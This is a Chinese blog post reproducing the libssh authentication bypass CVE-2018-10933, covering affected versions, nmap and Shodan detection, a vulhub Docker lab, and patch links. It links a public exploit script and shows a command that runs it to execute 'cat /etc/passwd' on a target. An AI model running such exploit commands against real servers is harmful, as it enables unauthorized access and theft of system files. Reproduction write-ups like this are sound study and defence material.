Libssh认证绕过CVE-2018-10933漏洞复现
0x00 漏洞描述
libssh 0.6 及以上的版本,在服务端的代码实现中存在身份认证绕过漏洞。在向服务端认证的流程中,攻击者通过将 SSH2_MSG_USERAUTH_REQUEST 消息替换为 SSH2_MSG_USERAUTH_SUCCESS,即可在无需任何有效凭证的情况下认证成
0x01 漏洞影响版本
libssh 0.8.x - 0.8.3
libssh 0.7.x - 0.7.5
libssh 0.6.x
0x02 漏洞检测
1.nmap扫描libssh版本
nmap -p 2222 -n-Pn -T5 -sC -Sv 149.*.*.85
2.Shodan.io libSSH
0x03 漏洞复现
1.最好在windows上运行脚本,在linux上运行脚本出现很多坑(很多依赖脚本安装有问题)Windows上安装python3,然后使用以下命令进行安装脚本运行依赖包:
pip3 installl paramiko
2.漏洞靶机部署,这里采用vulhub进行部署。(本机采用ubuntu16.04)
root@libssh:~# git clone https://github.com/vulhub/vulhub.git
root@libssh:~# cd vulhub/
root@libssh:~/vulhub# cd libssh/CVE-2018-10933/
root@libssh:~/vulhub/libssh/CVE-2018-10933# docker-compose build
root@libssh:~/vulhub/libssh/CVE-2018-10933# docker-compose up -d
3.本地环境中运行攻击脚本
脚本下载地址:
https://raw.githubusercontent.com/backlion/CVE-2018-10933/master/libssh-CVE-2018-10933.py
D:\python3>python.exe libssh-CVE-2018-10933.py 149.*.*.852222 "cat /etc/passwd"
(注意这里的2222端口是docker有libssh漏洞的sshd服务(22端口)映射出物理机主机的端口2222)
0x04 解决方案
官方已发布不受影响版本。建议受影响用户尽快升级。已修复版本Libssh 0.8.4和0.7.6下载链接如下:https://www.libssh.org/files
补丁地址:
https://www.libssh.org/security/patches/stable-0.6_CVE-2018-10933.jmcd.patch01.txt
更新地址:
https://www.libssh.org/files/0.7/libssh-0.7.6.tar.xz
https://www.libssh.org/files/0.8/libssh-0.8.4.tar.xz
注意:使用OpenSSH的SSH服务不受影响
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构